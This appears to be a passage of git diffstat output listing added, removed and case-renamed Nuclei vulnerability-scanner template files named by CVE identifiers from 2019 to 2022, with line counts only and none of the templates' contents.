nuclei-templates/CVE-2019/cve-2019-11043.yaml | 21 + nuclei-templates/CVE-2019/cve-2019-11370.yaml | 45 - nuclei-templates/CVE-2019/cve-2019-13396.yaml | 51 + ...VE-2019-14205.yaml => cve-2019-14205.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-14251.yaml | 38 + nuclei-templates/CVE-2019/cve-2019-14696.yaml | 33 + nuclei-templates/CVE-2019/cve-2019-15107.yaml | 37 + nuclei-templates/CVE-2019/cve-2019-15811.yaml | 49 + ...VE-2019-15859.yaml => 
cve-2019-15859.yaml} | 0 ...VE-2019-16332.yaml => cve-2019-16332.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-1653.yaml | 31 + nuclei-templates/CVE-2019/cve-2019-16932.yaml | 48 + nuclei-templates/CVE-2019/cve-2019-16996.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-18665.yaml | 37 - ...VE-2019-19134.yaml => cve-2019-19134.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-19985.yaml | 43 + nuclei-templates/CVE-2019/cve-2019-20210.yaml | 44 - nuclei-templates/CVE-2019/cve-2019-20354.yaml | 32 + nuclei-templates/CVE-2019/cve-2019-20933.yaml | 39 - ...{CVE-2019-2588.yaml => cve-2019-2588.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-2616.yaml | 31 + nuclei-templates/CVE-2019/cve-2019-3912.yaml | 29 + ...{CVE-2019-7192.yaml => cve-2019-7192.yaml} | 0 ...{CVE-2019-7238.yaml => cve-2019-7238.yaml} | 0 nuclei-templates/CVE-2019/cve-2019-7254.yaml | 35 + nuclei-templates/CVE-2019/cve-2019-7315.yaml | 35 + nuclei-templates/CVE-2019/cve-2019-7609.yaml | 45 + nuclei-templates/CVE-2019/cve-2019-8442.yaml | 29 + nuclei-templates/CVE-2019/cve-2019-8451.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-9041.yaml | 36 + nuclei-templates/CVE-2019/cve-2019-9915.yaml | 38 - nuclei-templates/CVE-2019/cve-2019-9922.yaml | 36 - nuclei-templates/CVE-2020/CVE-2020-10220.yaml | 52 - ...ve-2020-10549.yaml => CVE-2020-10549.yaml} | 0 ...{cve-2020-1147.yaml => CVE-2020-1147.yaml} | 0 ...ve-2020-11529.yaml => CVE-2020-11529.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-11978.yaml | 57 + nuclei-templates/CVE-2020/CVE-2020-11991.yaml | 47 - nuclei-templates/CVE-2020/CVE-2020-12271.yaml | 17 - ...ve-2020-12720.yaml => CVE-2020-12720.yaml} | 0 ...ve-2020-13117.yaml => CVE-2020-13117.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-13121.yaml | 24 - nuclei-templates/CVE-2020/CVE-2020-13945.yaml | 61 - ...ve-2020-14750.yaml => CVE-2020-14750.yaml} | 0 ...ve-2020-14883.yaml => CVE-2020-14883.yaml} | 0 ...ve-2020-15004.yaml => CVE-2020-15004.yaml} | 0 ...ve-2020-15129.yaml => CVE-2020-15129.yaml} | 0 
nuclei-templates/CVE-2020/CVE-2020-15227.yaml | 22 - ...ve-2020-15500.yaml => CVE-2020-15500.yaml} | 0 ...ve-2020-15505.yaml => CVE-2020-15505.yaml} | 0 ...ve-2020-15568.yaml => CVE-2020-15568.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-16846.yaml | 41 - ...ve-2020-16952.yaml => CVE-2020-16952.yaml} | 0 ...ve-2020-17518.yaml => CVE-2020-17518.yaml} | 0 ...ve-2020-17519.yaml => CVE-2020-17519.yaml} | 0 ...ve-2020-18268.yaml => CVE-2020-18268.yaml} | 0 ...{cve-2020-1938.yaml => CVE-2020-1938.yaml} | 0 ...{cve-2020-1943.yaml => CVE-2020-1943.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-2096.yaml | 43 - ...{cve-2020-2103.yaml => CVE-2020-2103.yaml} | 0 ...ve-2020-21224.yaml => CVE-2020-21224.yaml} | 0 ...{cve-2020-2140.yaml => CVE-2020-2140.yaml} | 0 ...{cve-2020-2199.yaml => CVE-2020-2199.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-22208.yaml | 32 + nuclei-templates/CVE-2020/CVE-2020-22210.yaml | 23 + nuclei-templates/CVE-2020/CVE-2020-22211.yaml | 32 + nuclei-templates/CVE-2020/CVE-2020-22840.yaml | 19 - ...ve-2020-23015.yaml => CVE-2020-23015.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-23517.yaml | 24 - nuclei-templates/CVE-2020/CVE-2020-23575.yaml | 31 - ...ve-2020-23972.yaml => CVE-2020-23972.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-24186.yaml | 89 - ...ve-2020-24312.yaml => CVE-2020-24312.yaml} | 0 ...ve-2020-24550.yaml => CVE-2020-24550.yaml} | 0 ...ve-2020-24571.yaml => CVE-2020-24571.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-24609.yaml | 1 - ...ve-2020-24765.yaml => CVE-2020-24765.yaml} | 0 ...ve-2020-24949.yaml => CVE-2020-24949.yaml} | 0 ...ve-2020-25223.yaml => CVE-2020-25223.yaml} | 0 ...ve-2020-25780.yaml => CVE-2020-25780.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-25864.yaml | 50 - ...ve-2020-26413.yaml => CVE-2020-26413.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-27361.yaml | 35 - ...ve-2020-28188.yaml => CVE-2020-28188.yaml} | 0 ...ve-2020-28208.yaml => CVE-2020-28208.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-28351.yaml | 42 - 
nuclei-templates/CVE-2020/CVE-2020-29597.yaml | 49 + ...{cve-2020-3187.yaml => CVE-2020-3187.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-35234.yaml | 30 + nuclei-templates/CVE-2020/CVE-2020-35489.yaml | 22 - nuclei-templates/CVE-2020/CVE-2020-3580.yaml | 45 - nuclei-templates/CVE-2020/CVE-2020-35847.yaml | 30 - ...ve-2020-35951.yaml => CVE-2020-35951.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-36112.yaml | 59 - ...ve-2020-36365.yaml => CVE-2020-36365.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-36510.yaml | 35 + nuclei-templates/CVE-2020/CVE-2020-4038.yaml | 31 - ...{cve-2020-4463.yaml => CVE-2020-4463.yaml} | 0 ...{cve-2020-5284.yaml => CVE-2020-5284.yaml} | 0 ...{cve-2020-5307.yaml => CVE-2020-5307.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-5410.yaml | 35 - nuclei-templates/CVE-2020/CVE-2020-5776.yaml | 51 - nuclei-templates/CVE-2020/CVE-2020-5777.yaml | 38 - nuclei-templates/CVE-2020/CVE-2020-6207.yaml | 55 - nuclei-templates/CVE-2020/CVE-2020-6287.yaml | 57 - ...{cve-2020-7136.yaml => CVE-2020-7136.yaml} | 0 ...{cve-2020-7209.yaml => CVE-2020-7209.yaml} | 0 ...{cve-2020-7246.yaml => CVE-2020-7246.yaml} | 0 ...{cve-2020-7961.yaml => CVE-2020-7961.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8115.yaml | 33 - ...{cve-2020-8163.yaml => CVE-2020-8163.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8191.yaml | 45 - ...{cve-2020-8209.yaml => CVE-2020-8209.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8512.yaml | 41 - ...{cve-2020-8771.yaml => CVE-2020-8771.yaml} | 0 ...{cve-2020-8813.yaml => CVE-2020-8813.yaml} | 0 nuclei-templates/CVE-2020/CVE-2020-8982.yaml | 40 - ...{cve-2020-9036.yaml => CVE-2020-9036.yaml} | 0 ...{cve-2020-9376.yaml => CVE-2020-9376.yaml} | 0 ...{cve-2020-9402.yaml => CVE-2020-9402.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-10220.yaml | 50 + ...VE-2020-11455.yaml => cve-2020-11455.yaml} | 0 ...VE-2020-11546.yaml => cve-2020-11546.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-11978.yaml | 60 - nuclei-templates/CVE-2020/cve-2020-11991.yaml | 47 + 
...VE-2020-12054.yaml => cve-2020-12054.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-12271.yaml | 18 + nuclei-templates/CVE-2020/cve-2020-13121.yaml | 34 + nuclei-templates/CVE-2020/cve-2020-13945.yaml | 58 + nuclei-templates/CVE-2020/cve-2020-16846.yaml | 41 + ...VE-2020-17362.yaml => cve-2020-17362.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-2096.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-22208.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22210.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22211.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22840.yaml | 28 + nuclei-templates/CVE-2020/cve-2020-23517.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-23575.yaml | 37 + nuclei-templates/CVE-2020/cve-2020-24186.yaml | 89 + ...VE-2020-24391.yaml => cve-2020-24391.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-25864.yaml | 47 + nuclei-templates/CVE-2020/cve-2020-27361.yaml | 32 + nuclei-templates/CVE-2020/cve-2020-28351.yaml | 41 + nuclei-templates/CVE-2020/cve-2020-29597.yaml | 54 - nuclei-templates/CVE-2020/cve-2020-35234.yaml | 34 - nuclei-templates/CVE-2020/cve-2020-35489.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-3580.yaml | 43 + nuclei-templates/CVE-2020/cve-2020-35847.yaml | 40 + nuclei-templates/CVE-2020/cve-2020-36112.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-36510.yaml | 42 - nuclei-templates/CVE-2020/cve-2020-4038.yaml | 33 + nuclei-templates/CVE-2020/cve-2020-5410.yaml | 30 + nuclei-templates/CVE-2020/cve-2020-5776.yaml | 46 + nuclei-templates/CVE-2020/cve-2020-5777.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-6207.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-6287.yaml | 55 + nuclei-templates/CVE-2020/cve-2020-8115.yaml | 31 + nuclei-templates/CVE-2020/cve-2020-8191.yaml | 42 + ...{CVE-2020-8497.yaml => cve-2020-8497.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-8512.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-8982.yaml | 34 + ...{CVE-2020-9054.yaml => cve-2020-9054.yaml} | 0 ...{CVE-2020-9757.yaml => cve-2020-9757.yaml} | 0 
...{CVE-20200924a.yaml => cve-20200924a.yaml} | 0 ...{cve-2021-1498.yaml => CVE-2021-1498.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-1499.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-20031.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-20090.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-20091.yaml | 54 - nuclei-templates/CVE-2021/CVE-2021-20092.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-20792.yaml | 52 - ...ve-2021-21234.yaml => CVE-2021-21234.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21745.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-21799.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-21801.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-21802.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-21805.yaml | 39 + nuclei-templates/CVE-2021/CVE-2021-21973.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-21985.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-22502.yaml | 37 - ...ve-2021-24176.yaml => CVE-2021-24176.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24210.yaml | 15 +- nuclei-templates/CVE-2021/CVE-2021-24226.yaml | 35 - ...ve-2021-24237.yaml => CVE-2021-24237.yaml} | 0 ...ve-2021-24274.yaml => CVE-2021-24274.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24276.yaml | 40 - ...ve-2021-24278.yaml => CVE-2021-24278.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24284.yaml | 62 - nuclei-templates/CVE-2021/CVE-2021-24288.yaml | 29 - ...ve-2021-24291.yaml => CVE-2021-24291.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24316.yaml | 32 - ...ve-2021-24358.yaml => CVE-2021-24358.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24488.yaml | 40 - ...ve-2021-24499.yaml => CVE-2021-24499.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24510.yaml | 50 - ...ve-2021-24746.yaml => CVE-2021-24746.yaml} | 0 ...ve-2021-24762.yaml => CVE-2021-24762.yaml} | 0 ...ve-2021-24838.yaml => CVE-2021-24838.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-24926.yaml | 47 - nuclei-templates/CVE-2021/CVE-2021-25033.yaml | 27 - nuclei-templates/CVE-2021/CVE-2021-25063.yaml | 49 - 
nuclei-templates/CVE-2021/CVE-2021-25085.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-25112.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-25281.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-25646.yaml | 78 - nuclei-templates/CVE-2021/CVE-2021-26247.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-26598.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-26855.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-27132.yaml | 29 + nuclei-templates/CVE-2021/CVE-2021-27519.yaml | 38 + nuclei-templates/CVE-2021/CVE-2021-27561.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-28149.yaml | 56 - ...ve-2021-28150.yaml => CVE-2021-28150.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-28151.yaml | 68 - nuclei-templates/CVE-2021/CVE-2021-28164.yaml | 35 - nuclei-templates/CVE-2021/CVE-2021-28377.yaml | 27 + ...ve-2021-28918.yaml => CVE-2021-28918.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29203.yaml | 52 - ...ve-2021-29441.yaml => CVE-2021-29441.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29442.yaml | 30 - nuclei-templates/CVE-2021/CVE-2021-29484.yaml | 42 - ...ve-2021-29622.yaml => CVE-2021-29622.yaml} | 0 ...ve-2021-29625.yaml => CVE-2021-29625.yaml} | 0 ...ve-2021-30049.yaml => CVE-2021-30049.yaml} | 0 ...{cve-2021-3019.yaml => CVE-2021-3019.yaml} | 0 ...ve-2021-31249.yaml => CVE-2021-31249.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31537.yaml | 25 - ...ve-2021-31581.yaml => CVE-2021-31581.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31589.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-31856.yaml | 41 - nuclei-templates/CVE-2021/CVE-2021-3223.yaml | 35 + nuclei-templates/CVE-2021/CVE-2021-32305.yaml | 34 - nuclei-templates/CVE-2021/CVE-2021-32853.yaml | 40 - ...{cve-2021-3297.yaml => CVE-2021-3297.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33044.yaml | 57 - nuclei-templates/CVE-2021/CVE-2021-33221.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-3377.yaml | 28 - ...{cve-2021-3378.yaml => CVE-2021-3378.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-33904.yaml | 25 - 
nuclei-templates/CVE-2021/CVE-2021-34473.yaml | 35 - nuclei-templates/CVE-2021/CVE-2021-34621.yaml | 106 - nuclei-templates/CVE-2021/CVE-2021-34640.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-34805.yaml | 35 - ...ve-2021-35265.yaml => CVE-2021-35265.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-35464.yaml | 34 - ...{cve-2021-3577.yaml => CVE-2021-3577.yaml} | 0 ...ve-2021-36380.yaml => CVE-2021-36380.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36749.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-37216.yaml | 43 - nuclei-templates/CVE-2021/CVE-2021-37416.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-37589.yaml | 55 + nuclei-templates/CVE-2021/CVE-2021-37704.yaml | 46 - nuclei-templates/CVE-2021/CVE-2021-37833.yaml | 45 - ...ve-2021-38647.yaml => CVE-2021-38647.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-38702.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-39312.yaml | 40 - ...ve-2021-39322.yaml => CVE-2021-39322.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-39327.yaml | 43 - ...ve-2021-39350.yaml => CVE-2021-39350.yaml} | 0 ...ve-2021-39501.yaml => CVE-2021-39501.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40149.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-40150.yaml | 33 - ...ve-2021-40438.yaml => CVE-2021-40438.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-40539.yaml | 116 - nuclei-templates/CVE-2021/CVE-2021-40875.yaml | 41 - nuclei-templates/CVE-2021/CVE-2021-41174.yaml | 51 - ...ve-2021-41192.yaml => CVE-2021-41192.yaml} | 0 ...ve-2021-41293.yaml => CVE-2021-41293.yaml} | 0 ...ve-2021-41349.yaml => CVE-2021-41349.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41467.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-41569.yaml | 28 - ...ve-2021-41653.yaml => CVE-2021-41653.yaml} | 0 ...ve-2021-41691.yaml => CVE-2021-41691.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41773.yaml | 18 + ...ve-2021-41826.yaml => CVE-2021-41826.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41878.yaml | 45 - ...ve-2021-41951.yaml => CVE-2021-41951.yaml} | 0 
nuclei-templates/CVE-2021/CVE-2021-42013.yaml | 61 - ...ve-2021-42258.yaml => CVE-2021-42258.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-42551.yaml | 49 - nuclei-templates/CVE-2021/CVE-2021-42565.yaml | 42 - ...ve-2021-43495.yaml => CVE-2021-43495.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-44529.yaml | 41 - ...ve-2021-44848.yaml => CVE-2021-44848.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-45043.yaml | 40 - nuclei-templates/CVE-2021/CVE-2021-45092.yaml | 31 - nuclei-templates/CVE-2021/CVE-2021-45380.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-45428.yaml | 43 + nuclei-templates/CVE-2021/CVE-2021-45968.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-46379.yaml | 28 - ...ve-2021-46381.yaml => CVE-2021-46381.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-46387.yaml | 45 - nuclei-templates/CVE-2021/CVE-2021-46424.yaml | 39 - nuclei-templates/CVE-2021/cve-2021-1499.yaml | 55 + nuclei-templates/CVE-2021/cve-2021-20031.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-20090.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-20091.yaml | 53 + nuclei-templates/CVE-2021/cve-2021-20092.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-20792.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-21745.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21799.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-21801.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21802.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21805.yaml | 46 - ...VE-2021-21816.yaml => cve-2021-21816.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21973.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21985.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-22502.yaml | 63 + ...VE-2021-23241.yaml => cve-2021-23241.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24226.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-24276.yaml | 38 + nuclei-templates/CVE-2021/cve-2021-24284.yaml | 71 + nuclei-templates/CVE-2021/cve-2021-24288.yaml | 27 + ...VE-2021-24298.yaml => cve-2021-24298.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24316.yaml | 40 + 
...VE-2021-24335.yaml => cve-2021-24335.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-24488.yaml | 47 + nuclei-templates/CVE-2021/cve-2021-24510.yaml | 48 + nuclei-templates/CVE-2021/cve-2021-24926.yaml | 45 + nuclei-templates/CVE-2021/cve-2021-25033.yaml | 30 + nuclei-templates/CVE-2021/cve-2021-25063.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-25085.yaml | 42 + nuclei-templates/CVE-2021/cve-2021-25112.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-25281.yaml | 46 + nuclei-templates/CVE-2021/cve-2021-25646.yaml | 84 + nuclei-templates/CVE-2021/cve-2021-26247.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-26598.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-26855.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-27132.yaml | 40 - nuclei-templates/CVE-2021/cve-2021-27519.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-27561.yaml | 48 + nuclei-templates/CVE-2021/cve-2021-28149.yaml | 49 + nuclei-templates/CVE-2021/cve-2021-28151.yaml | 57 + nuclei-templates/CVE-2021/cve-2021-28164.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-28377.yaml | 33 - nuclei-templates/CVE-2021/cve-2021-29203.yaml | 56 + nuclei-templates/CVE-2021/cve-2021-29442.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-29484.yaml | 39 + ...VE-2021-30151.yaml => cve-2021-30151.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-30461.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-31537.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-31589.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-31856.yaml | 38 + ...VE-2021-32172.yaml => cve-2021-32172.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-3223.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-32305.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-32853.yaml | 38 + ...{CVE-2021-3293.yaml => cve-2021-3293.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-33044.yaml | 55 + nuclei-templates/CVE-2021/cve-2021-33221.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-3377.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-33904.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-34473.yaml | 35 + 
nuclei-templates/CVE-2021/cve-2021-34621.yaml | 112 + nuclei-templates/CVE-2021/cve-2021-34640.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-34805.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-35464.yaml | 50 + nuclei-templates/CVE-2021/cve-2021-36749.yaml | 36 + nuclei-templates/CVE-2021/cve-2021-37216.yaml | 42 + nuclei-templates/CVE-2021/cve-2021-37416.yaml | 45 + ...VE-2021-37580.yaml => cve-2021-37580.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-37589.yaml | 62 - nuclei-templates/CVE-2021/cve-2021-37704.yaml | 45 + nuclei-templates/CVE-2021/cve-2021-37833.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-38702.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-39312.yaml | 44 + ...VE-2021-39316.yaml => cve-2021-39316.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-39327.yaml | 43 + ...VE-2021-39433.yaml => cve-2021-39433.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40149.yaml | 40 - nuclei-templates/CVE-2021/cve-2021-40150.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-40539.yaml | 116 + ...VE-2021-40868.yaml => cve-2021-40868.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-40875.yaml | 41 + ...VE-2021-40960.yaml => cve-2021-40960.yaml} | 0 ...VE-2021-40978.yaml => cve-2021-40978.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41174.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-41467.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-41569.yaml | 35 + ...VE-2021-41649.yaml => cve-2021-41649.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-41878.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-42013.yaml | 51 + nuclei-templates/CVE-2021/cve-2021-42551.yaml | 49 + nuclei-templates/CVE-2021/cve-2021-42565.yaml | 42 + ...VE-2021-43496.yaml => cve-2021-43496.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-44529.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-45043.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-45092.yaml | 31 + nuclei-templates/CVE-2021/cve-2021-45380.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-45428.yaml | 48 - nuclei-templates/CVE-2021/cve-2021-45968.yaml | 41 + 
nuclei-templates/CVE-2021/cve-2021-46379.yaml | 31 + nuclei-templates/CVE-2021/cve-2021-46387.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-46424.yaml | 44 + ...{cve-2022-0148.yaml => CVE-2022-0148.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0165.yaml | 26 - nuclei-templates/CVE-2022/CVE-2022-0201.yaml | 31 - ...{cve-2022-0271.yaml => CVE-2022-0271.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0288.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-0422.yaml | 41 + nuclei-templates/CVE-2022/CVE-2022-0482.yaml | 57 - nuclei-templates/CVE-2022/CVE-2022-0540.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-0543.yaml | 35 - ...{cve-2022-0591.yaml => CVE-2022-0591.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0653.yaml | 37 + ...{cve-2022-0692.yaml => CVE-2022-0692.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0776.yaml | 31 + nuclei-templates/CVE-2022/CVE-2022-0870.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-1040.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-1119.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1221.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-1388.yaml | 57 + nuclei-templates/CVE-2022/CVE-2022-1392.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-1609.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1904.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-1906.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-21500.yaml | 37 + nuclei-templates/CVE-2022/CVE-2022-2187.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-22536.yaml | 63 - ...ve-2022-22954.yaml => CVE-2022-22954.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-22963.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-22972.yaml | 93 - nuclei-templates/CVE-2022/CVE-2022-23131.yaml | 44 - nuclei-templates/CVE-2022/CVE-2022-23134.yaml | 43 - ...ve-2022-23347.yaml => CVE-2022-23347.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-23779.yaml | 61 + nuclei-templates/CVE-2022/CVE-2022-23881.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-24112.yaml | 80 - nuclei-templates/CVE-2022/CVE-2022-24129.yaml | 31 - 
nuclei-templates/CVE-2022/CVE-2022-24181.yaml | 39 + nuclei-templates/CVE-2022/CVE-2022-24260.yaml | 49 + ...ve-2022-24288.yaml => CVE-2022-24288.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-2486.yaml | 34 + nuclei-templates/CVE-2022/CVE-2022-2487.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-26134.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-26135.yaml | 28 + nuclei-templates/CVE-2022/CVE-2022-26138.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-26148.yaml | 52 - nuclei-templates/CVE-2022/CVE-2022-26159.yaml | 39 - nuclei-templates/CVE-2022/CVE-2022-26233.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-26960.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-27927.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-28079.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-28080.yaml | 65 - nuclei-templates/CVE-2022/CVE-2022-28219.yaml | 53 - ...ve-2022-28365.yaml => CVE-2022-28365.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-29014.yaml | 31 - nuclei-templates/CVE-2022/CVE-2022-29298.yaml | 33 - ...ve-2022-29303.yaml => CVE-2022-29303.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-29383.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29548.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-30776.yaml | 38 + nuclei-templates/CVE-2022/CVE-2022-31268.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-31373.yaml | 36 - nuclei-templates/CVE-2022/CVE-2022-32015.yaml | 29 - nuclei-templates/CVE-2022/CVE-2022-32022.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-32025.yaml | 46 + nuclei-templates/CVE-2022/CVE-2022-32026.yaml | 47 